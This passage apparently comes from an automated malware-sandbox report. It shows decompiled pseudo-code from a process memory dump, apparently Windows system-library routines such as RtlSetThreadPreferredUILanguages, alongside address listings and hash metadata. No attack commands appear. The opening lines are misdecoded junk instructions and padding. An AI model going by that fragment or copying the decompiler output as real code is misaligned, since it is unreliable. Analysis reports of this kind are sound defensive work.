					asm("loopne 0x29");
					_t247 = _t244 & 1;
					_t336 = _t333 + 1;
					 *((intOrPtr*)(_t300 + _t247)) =  *((intOrPtr*)(_t300 + _t247)) - _t247;
					_t248 = _t247 + 0x1f012426;
					_pop(_t291);
					 *_t300 =  *_t300 - _t248;
					_t249 = _t345;
					_t347 = _t248;
					 *((intOrPtr*)(_t300 + _t249)) =  *((intOrPtr*)(_t300 + _t249)) - _t249;
					_t250 = _t249 ^ 0x0201285b;
					 *((intOrPtr*)(_t300 + _t250)) =  *((intOrPtr*)(_t300 + _t250)) - _t347;
					 *_t250 =  *_t250 - 0x24;
					asm("daa");
					_t251 = _t250 & 0x00000001;
					_push(ds);
					 *((intOrPtr*)(_t300 + _t251)) =  *((intOrPtr*)(_t300 + _t251)) - _t251;
					_t338 = _t333 + 1 + _t336 - 1;
					 *((intOrPtr*)(_t300 + _t251)) =  *((intOrPtr*)(_t300 + _t251)) - _t251;
					asm("daa");
					_t252 = _t251 & 0x00000001;
					asm("fcomp dword [ebx+0x28]");
					 *((intOrPtr*)(_t252 +  &_a1546912032)) =  *((intOrPtr*)(_t252 +  &_a1546912032)) + _t333 + 1 + _t336 - 1;
					 *_t300 =  *_t300 - _t252;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x12eff00);
					E0126D08C(_t291, _t328, _t338);
					_v44 =  *[fs:0x18];
					_t329 = 0;
					 *_a24 = 0;
					_t292 = _a12;
					__eflags = _t292;
					if(_t292 == 0) {
						_t255 = 0xc0000100;
					} else {
						_v8 = 0;
						_t339 = 0xc0000100;
						_v52 = 0xc0000100;
						_t257 = 4;
						while(1) {
							_v40 = _t257;
							__eflags = _t257;
							if(_t257 == 0) {
								break;
							}
							_t305 = _t257 * 0xc;
							_v48 = _t305;
							__eflags = _t292 -  *((intOrPtr*)(_t305 + 0x11f1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t272 = E0125E5C0(_a8,  *((intOrPtr*)(_t305 + 0x11f1668)), _t292);
									_t347 = _t347 + 0xc;
									__eflags = _t272;
									if(__eflags == 0) {
										_t339 = E012951BE(_t292,  *((intOrPtr*)(_v48 + 0x11f166c)), _a16, _t329, _t339, __eflags, _a20, _a24);
										_v52 = _t339;
										break;
									} else {
										_t257 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t257 = _t257 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t339;
						__eflags = _t339;
						if(_t339 < 0) {
							__eflags = _t339 - 0xc0000100;
							if(_t339 == 0xc0000100) {
								_t301 = _a4;
								__eflags = _t301;
								if(_t301 != 0) {
									_v36 = _t301;
									__eflags =  *_t301 - _t329;
									if( *_t301 == _t329) {
										_t339 = 0xc0000100;
										goto L76;
									} else {
										_t317 =  *((intOrPtr*)(_v44 + 0x30));
										_t259 =  *((intOrPtr*)(_t317 + 0x10));
										__eflags =  *((intOrPtr*)(_t259 + 0x48)) - _t301;
										if( *((intOrPtr*)(_t259 + 0x48)) == _t301) {
											__eflags =  *(_t317 + 0x1c);
											if( *(_t317 + 0x1c) == 0) {
												L106:
												_t339 = E01242AE4( &_v36, _a8, _t292, _a16, _a20, _a24);
												_v32 = _t339;
												__eflags = _t339 - 0xc0000100;
												if(_t339 != 0xc0000100) {
													goto L69;
												} else {
													_t329 = 1;
													_t301 = _v36;
													goto L75;
												}
											} else {
												_t262 = E01226600( *(_t317 + 0x1c));
												__eflags = _t262;
												if(_t262 != 0) {
													goto L106;
												} else {
													_t301 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t339 = E01242C50(_t301, _a8, _t292, _a16, _a20, _a24, _t329);
											L76:
											_v32 = _t339;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0122EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t339 = _a24;
									_t269 = E01242AE4( &_v36, _a8, _t292, _a16, _a20, _t339);
									_v32 = _t269;
									__eflags = _t269 - 0xc0000100;
									if(_t269 == 0xc0000100) {
										_v32 = E01242C50(_v36, _a8, _t292, _a16, _a20, _t339, 1);
									}
									_v8 = _t329;
									E01242ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t255 = _t339;
					}
					L70:
					return E0126D0D1(_t255);
				}
				L108:
			}


























































                                                    0x01242584
                                                    0x01242586
                                                    0x01242590
                                                    0x01242596
                                                    0x01242597
                                                    0x01242598
                                                    0x01242599
                                                    0x0124259e
                                                    0x012425a4
                                                    0x012425a9
                                                    0x012425ac
                                                    0x012425ae
                                                    0x012425b1
                                                    0x012425b2
                                                    0x012425b5
                                                    0x012425b8
                                                    0x012425bb
                                                    0x012425bc
                                                    0x012425bf
                                                    0x012425c2
                                                    0x012425c5
                                                    0x012425c6
                                                    0x012425cb
                                                    0x012425ce
                                                    0x012425d8
                                                    0x012425db
                                                    0x012425dd
                                                    0x012425de
                                                    0x012425e1
                                                    0x012425e3
                                                    0x012425e9
                                                    0x012426da
                                                    0x012426da
                                                    0x012426dd
                                                    0x012426e2
                                                    0x01285b56
                                                    0x00000000
                                                    0x012426e8
                                                    0x012426f9
                                                    0x012426fb
                                                    0x012426fe
                                                    0x01242700
                                                    0x01285b60
                                                    0x00000000
                                                    0x01242706
                                                    0x01242706
                                                    0x0124270a
                                                    0x0124270a
                                                    0x0124270d
                                                    0x01242713
                                                    0x01242716
                                                    0x01242718
                                                    0x0124271c
                                                    0x0124271e
                                                    0x01285b6c
                                                    0x01285b6f
                                                    0x01285b7f
                                                    0x01285b89
                                                    0x01285b8e
                                                    0x01285b93
                                                    0x01285b96
                                                    0x01285b9c
                                                    0x01285ba0
                                                    0x01285ba3
                                                    0x01285bab
                                                    0x01285bb0
                                                    0x01285bb3
                                                    0x01285bb3
                                                    0x01285ba3
                                                    0x01242724
                                                    0x01242726
                                                    0x01242729
                                                    0x0124272c
                                                    0x0124279d
                                                    0x0124279d
                                                    0x012427a0
                                                    0x012427a2
                                                    0x00000000
                                                    0x0124272e
                                                    0x0124272e
                                                    0x01242731
                                                    0x01242734
                                                    0x01242734
                                                    0x01242736
                                                    0x01285bc1
                                                    0x01285bc1
                                                    0x01285bc4
                                                    0x00000000
                                                    0x01285bca
                                                    0x01285bca
                                                    0x01285bcd
                                                    0x00000000
                                                    0x01285bd3
                                                    0x00000000
                                                    0x01285bd3
                                                    0x01285bcd
                                                    0x0124273c
                                                    0x0124273c
                                                    0x01242742
                                                    0x01242747
                                                    0x0124274a
                                                    0x0124274d
                                                    0x01242750
                                                    0x00000000
                                                    0x01242756
                                                    0x01242756
                                                    0x00000000
                                                    0x01242902
                                                    0x01242908
                                                    0x0124290b
                                                    0x00000000
                                                    0x01242911
                                                    0x0124291c
                                                    0x01242921
                                                    0x00000000
                                                    0x01242921
                                                    0x00000000
                                                    0x00000000
                                                    0x01242880
                                                    0x01242887
                                                    0x0124288c
                                                    0x00000000
                                                    0x00000000
                                                    0x01242805
                                                    0x0124280a
                                                    0x01242814
                                                    0x01242816
                                                    0x00000000
                                                    0x00000000
                                                    0x0124281e
                                                    0x01242821
                                                    0x01242823
                                                    0x00000000
                                                    0x01242829
                                                    0x01242829
                                                    0x01242831
                                                    0x0124283c
                                                    0x0124283e
                                                    0x00000000
                                                    0x0124283e
                                                    0x00000000
                                                    0x00000000
                                                    0x0124284e
                                                    0x01242850
                                                    0x01242851
                                                    0x01242854
                                                    0x01242857
                                                    0x0124285a
                                                    0x0124285c
                                                    0x0124285d
                                                    0x00000000
                                                    0x00000000
                                                    0x0124275d
                                                    0x01242761
                                                    0x00000000
                                                    0x01242767
                                                    0x0124276e
                                                    0x01242773
                                                    0x01242773
                                                    0x01242776
                                                    0x01242778
                                                    0x0124277e
                                                    0x0124277e
                                                    0x01242781
                                                    0x01242781
                                                    0x01242783
                                                    0x01242784
                                                    0x00000000
                                                    0x00000000
                                                    0x01285bd8
                                                    0x01285bde
                                                    0x01285be4
                                                    0x01285be6
                                                    0x01285be8
                                                    0x01285be9
                                                    0x01285bee
                                                    0x01285bf8
                                                    0x01285bff
                                                    0x01285c01
                                                    0x01285c04
                                                    0x01285c07
                                                    0x01285c0b
                                                    0x01285c0d
                                                    0x01285c0d
                                                    0x01285c15
                                                    0x01285c18
                                                    0x01285c1b
                                                    0x01285c1b
                                                    0x01285c1e
                                                    0x00000000
                                                    0x00000000
                                                    0x012428c3
                                                    0x012428c8
                                                    0x012428d2
                                                    0x012428d4
                                                    0x012428d8
                                                    0x012428db
                                                    0x01285c26
                                                    0x01285c28
                                                    0x01285c2d
                                                    0x01285c2d
                                                    0x00000000
                                                    0x00000000
                                                    0x01285c34
                                                    0x01285c36
                                                    0x01285c49
                                                    0x01285c4e
                                                    0x01285c54
                                                    0x01285c5b
                                                    0x01285c5d
                                                    0x01285c60
                                                    0x01242788
                                                    0x01242788
                                                    0x0124278b
                                                    0x0124278e
                                                    0x0124278e
                                                    0x0124278e
                                                    0x01242791
                                                    0x00000000
                                                    0x00000000
                                                    0x01242756
                                                    0x01242750
                                                    0x00000000
                                                    0x01242794
                                                    0x01242794
                                                    0x01242795
                                                    0x01242798
                                                    0x01242798
                                                    0x00000000
                                                    0x01242734
                                                    0x0124272c
                                                    0x01242700
                                                    0x012425ef
                                                    0x012425ef
                                                    0x012425ef
                                                    0x012425f2
                                                    0x012425f8
                                                    0x00000000
                                                    0x00000000
                                                    0x012425fe
                                                    0x00000000
                                                    0x012428e6
                                                    0x012428ec
                                                    0x012428ef
                                                    0x012428f5
                                                    0x012428f8
                                                    0x012428f8
                                                    0x00000000
                                                    0x012428f8
                                                    0x00000000
                                                    0x00000000
                                                    0x01242866
                                                    0x01242866
                                                    0x01242876
                                                    0x01242879
                                                    0x00000000
                                                    0x00000000
                                                    0x012427e0
                                                    0x012427e7
                                                    0x012427e9
                                                    0x012427eb
                                                    0x01285afd
                                                    0x00000000
                                                    0x01285afd
                                                    0x00000000
                                                    0x00000000
                                                    0x01242633
                                                    0x01242638
                                                    0x0124263b
                                                    0x0124263c
                                                    0x0124263e
                                                    0x01242640
                                                    0x01242642
                                                    0x01242647
                                                    0x01242649
                                                    0x0124264e
                                                    0x01242650
                                                    0x01242653
                                                    0x01242659
                                                    0x012426a2
                                                    0x012426a7
                                                    0x012426ac
                                                    0x012426b2
                                                    0x01285b11
                                                    0x01285b15
                                                    0x01285b17
                                                    0x00000000
                                                    0x012426b8
                                                    0x012426b8
                                                    0x012426ba
                                                    0x012427a6
                                                    0x012427a6
                                                    0x012427a9
                                                    0x012427ab
                                                    0x012427b9
                                                    0x012427b9
                                                    0x012427be
                                                    0x012427c1
                                                    0x012427c3
                                                    0x012427c5
                                                    0x012427c7
                                                    0x01285c74
                                                    0x01285c79
                                                    0x01285c79
                                                    0x012427c7
                                                    0x00000000
                                                    0x012426c0
                                                    0x012426c0
                                                    0x012426c3
                                                    0x012426c6
                                                    0x012426c6
                                                    0x012426c9
                                                    0x012426c9
                                                    0x00000000
                                                    0x012426c9
                                                    0x012426ba
                                                    0x0124265b
                                                    0x0124265b
                                                    0x0124265e
                                                    0x01242667
                                                    0x0124266d
                                                    0x01242677
                                                    0x0124267c
                                                    0x0124267f
                                                    0x01242681
                                                    0x01285b49
                                                    0x01285b4e
                                                    0x012427cd
                                                    0x012427d0
                                                    0x012427d1
                                                    0x012427d2
                                                    0x012427d4
                                                    0x012427dd
                                                    0x01242687
                                                    0x01242687
                                                    0x0124268a
                                                    0x0124268b
                                                    0x0124268e
                                                    0x0124268f
                                                    0x01242691
                                                    0x01242696
                                                    0x01242698
                                                    0x0124269d
                                                    0x0124269f
                                                    0x00000000
                                                    0x0124269f
                                                    0x01242681
                                                    0x00000000
                                                    0x00000000
                                                    0x01242846
                                                    0x00000000
                                                    0x00000000
                                                    0x01242605
                                                    0x0124260a
                                                    0x0124260c
                                                    0x01242611
                                                    0x01242616
                                                    0x01242619
                                                    0x01242619
                                                    0x0124261e
                                                    0x00000000
                                                    0x01242624
                                                    0x01242627
                                                    0x01242627
                                                    0x00000000
                                                    0x00000000
                                                    0x01285b1f
                                                    0x00000000
                                                    0x00000000
                                                    0x01242894
                                                    0x0124289b
                                                    0x0124289d
                                                    0x012428a1
                                                    0x01285b2b
                                                    0x01285b2e
                                                    0x01285b2e
                                                    0x012428a7
                                                    0x012428a9
                                                    0x01285b04
                                                    0x01285b09
                                                    0x01285b09
                                                    0x01285b09
                                                    0x00000000
                                                    0x00000000
                                                    0x01285b35
                                                    0x01285b3c
                                                    0x012428fb
                                                    0x012428fb
                                                    0x012426cc
                                                    0x012426cc
                                                    0x012426d0
                                                    0x00000000
                                                    0x012426d2
                                                    0x012426d2
                                                    0x00000000
                                                    0x012426d2
                                                    0x00000000
                                                    0x00000000
                                                    0x012425fe
                                                    0x0124292d
                                                    0x0124292f
                                                    0x01242930
                                                    0x01242935
                                                    0x01242939
                                                    0x0124293d
                                                    0x01242941
                                                    0x01242945
                                                    0x01242946
                                                    0x01242949
                                                    0x0124294e
                                                    0x0124294f
                                                    0x01242951
                                                    0x01242951
                                                    0x01242952
                                                    0x01242955
                                                    0x0124295a
                                                    0x0124295d
                                                    0x01242962
                                                    0x01242963
                                                    0x01242965
                                                    0x01242966
                                                    0x01242969
                                                    0x0124296a
                                                    0x0124296e
                                                    0x0124296f
                                                    0x01242971
                                                    0x01242974
                                                    0x0124297b
                                                    0x0124297d
                                                    0x0124297e
                                                    0x0124297f
                                                    0x01242980
                                                    0x01242981
                                                    0x01242982
                                                    0x01242983
                                                    0x01242984
                                                    0x01242985
                                                    0x01242986
                                                    0x01242987
                                                    0x01242988
                                                    0x01242989
                                                    0x0124298a
                                                    0x0124298b
                                                    0x0124298c
                                                    0x0124298d
                                                    0x0124298e
                                                    0x0124298f
                                                    0x01242990
                                                    0x01242992
                                                    0x01242997
                                                    0x012429a3
                                                    0x012429a6
                                                    0x012429ab
                                                    0x012429ad
                                                    0x012429b0
                                                    0x012429b2
                                                    0x01285c80
                                                    0x012429b8
                                                    0x012429b8
                                                    0x012429bb
                                                    0x012429c0
                                                    0x012429c5
                                                    0x012429c6
                                                    0x012429c6
                                                    0x012429c9
                                                    0x012429cb
                                                    0x00000000
                                                    0x00000000
                                                    0x012429cd
                                                    0x012429d0
                                                    0x012429d9
                                                    0x012429db
                                                    0x012429dd
                                                    0x01242a7f
                                                    0x01242a84
                                                    0x01242a87
                                                    0x01242a89
                                                    0x01285ca1
                                                    0x01285ca3
                                                    0x00000000
                                                    0x01242a8f
                                                    0x01242a8f
                                                    0x00000000
                                                    0x01242a8f
                                                    0x00000000
                                                    0x012429e3
                                                    0x012429e3
                                                    0x012429e3
                                                    0x00000000
                                                    0x012429e3
                                                    0x012429dd
                                                    0x00000000
                                                    0x012429db
                                                    0x012429e6
                                                    0x012429e9
                                                    0x012429eb
                                                    0x012429ed
                                                    0x012429f3
                                                    0x012429f5
                                                    0x012429f8
                                                    0x012429fa
                                                    0x01242a97
                                                    0x01242a9a
                                                    0x01242a9d
                                                    0x01242add
                                                    0x00000000
                                                    0x01242a9f
                                                    0x01242aa2
                                                    0x01242aa5
                                                    0x01242aa8
                                                    0x01242aab
                                                    0x01285cab
                                                    0x01285caf
                                                    0x01285cc5
                                                    0x01285cda
                                                    0x01285cdc
                                                    0x01285cdf
                                                    0x01285ce5
                                                    0x00000000
                                                    0x01285ceb
                                                    0x01285ced
                                                    0x01285cee
                                                    0x00000000
                                                    0x01285cee
                                                    0x01285cb1
                                                    0x01285cb4
                                                    0x01285cb9
                                                    0x01285cbb
                                                    0x00000000
                                                    0x01285cbd
                                                    0x01285cbd
                                                    0x00000000
                                                    0x01285cbd
                                                    0x01285cbb
                                                    0x01242ab1
                                                    0x01242ab1
                                                    0x01242ac4
                                                    0x01242ac6
                                                    0x01242ac6
                                                    0x00000000
                                                    0x01242ac6
                                                    0x01242aab
                                                    0x00000000
                                                    0x01242a00
                                                    0x01242a09
                                                    0x01242a0e
                                                    0x01242a21
                                                    0x01242a24
                                                    0x01242a35
                                                    0x01242a3a
                                                    0x01242a3d
                                                    0x01242a42
                                                    0x01242a59
                                                    0x01242a59
                                                    0x01242a5c
                                                    0x01242a5f
                                                    0x01242a5f
                                                    0x012429fa
                                                    0x012429f3
                                                    0x01242a64
                                                    0x01242a64
                                                    0x01242a6b
                                                    0x01242a6b
                                                    0x01242a6d
                                                    0x01242a72
                                                    0x01242a72
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: PATH
                                                    • API String ID: 0-1036084923
                                                    • Opcode ID: 1f123efdbac69946b0ff046e6661090ee6acf21589007f7764a52080f1595efc
                                                    • Instruction ID: 2a57d5bf35a25e01e3e0fe6817ea0a0c664c54315c60fea6d6169d39d11ef074
                                                    • Opcode Fuzzy Hash: 1f123efdbac69946b0ff046e6661090ee6acf21589007f7764a52080f1595efc
                                                    • Instruction Fuzzy Hash: 1FC19275D20216EFDB29DF9AE891ABDBBB5FF58700F044019F501BB250E774A841CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0124FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 80%
                                                    			E0124FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0122EEF0(0x1307b60);
					_t134 =  *0x1307b84; // 0x771c7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1307b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1307b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E01226D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E012276E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E012B8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0121B150();
													}
													_t116 = E012B6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E012275CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1308638; // 0xce61e8
																	_t122 = L012238A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E012276E2(_t154);
																			goto L41;
																		}
																	} else {
																		E012276E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0124FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L012270F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0124FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0124FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0124FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0124FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0124FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1307b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1307b84 = _t75;
						_t73 = E0122EB70(_t134, 0x1307b60);
						if( *0x1307b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0122FF60( *0x1307b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                    0x0124fab0
                                                    0x0124fab2
                                                    0x0124fab3
                                                    0x0124fab4
                                                    0x0124fabc
                                                    0x0124fac0
                                                    0x0124fb14
                                                    0x0124fb17
                                                    0x0124fac2
                                                    0x0124fac8
                                                    0x0124facd
                                                    0x0124fad3
                                                    0x0124fad3
                                                    0x0124fadd
                                                    0x0124fb18
                                                    0x0124fb1b
                                                    0x0124fb1d
                                                    0x0124fb1e
                                                    0x0124fb1f
                                                    0x0124fb20
                                                    0x0124fb21
                                                    0x0124fb22
                                                    0x0124fb23
                                                    0x0124fb24
                                                    0x0124fb25
                                                    0x0124fb26
                                                    0x0124fb27
                                                    0x0124fb28
                                                    0x0124fb29
                                                    0x0124fb2a
                                                    0x0124fb2b
                                                    0x0124fb2c
                                                    0x0124fb2d
                                                    0x0124fb2e
                                                    0x0124fb2f
                                                    0x0124fb3a
                                                    0x0124fb3b
                                                    0x0124fb3e
                                                    0x0124fb41
                                                    0x0124fb44
                                                    0x0124fb47
                                                    0x0124fb4a
                                                    0x0124fb4d
                                                    0x0124fb53
                                                    0x0128bdcb
                                                    0x0128bdcb
                                                    0x0124fb59
                                                    0x0124fb5b
                                                    0x0124fb5b
                                                    0x0124fb5e
                                                    0x0128bdd5
                                                    0x0128bdd8
                                                    0x00000000
                                                    0x0128bdda
                                                    0x00000000
                                                    0x0128bdda
                                                    0x0124fb64
                                                    0x0124fb64
                                                    0x0124fb64
                                                    0x0124fb67
                                                    0x0124fb6e
                                                    0x0124fb70
                                                    0x0124fb72
                                                    0x00000000
                                                    0x0124fb78
                                                    0x0124fb7a
                                                    0x0124fb7a
                                                    0x0124fb7d
                                                    0x0124fb80
                                                    0x0128bddf
                                                    0x0128bde1
                                                    0x00000000
                                                    0x0128bde3
                                                    0x00000000
                                                    0x0128bde3
                                                    0x0124fb86
                                                    0x0124fb86
                                                    0x0124fb86
                                                    0x0124fb8b
                                                    0x0124fb90
                                                    0x0124fb92
                                                    0x0124fb94
                                                    0x0124fb9a
                                                    0x0124fb9b
                                                    0x0124fba1
                                                    0x0128bde8
                                                    0x0128bdeb
                                                    0x0128bded
                                                    0x0128beb5
                                                    0x0128beb5
                                                    0x0128bebb
                                                    0x0128bebd
                                                    0x0128bec3
                                                    0x0128bed2
                                                    0x0128bedd
                                                    0x0128bedd
                                                    0x0128beed
                                                    0x00000000
                                                    0x0128bdf3
                                                    0x0128bdfe
                                                    0x0128be06
                                                    0x0128be0b
                                                    0x0128be0d
                                                    0x0128be0f
                                                    0x0128be14
                                                    0x0128be19
                                                    0x0128be20
                                                    0x0128be25
                                                    0x0128be27
                                                    0x0128be35
                                                    0x0128be39
                                                    0x0128be46
                                                    0x0128be4f
                                                    0x0128be54
                                                    0x0128be56
                                                    0x0128bef8
                                                    0x0128bef8
                                                    0x00000000
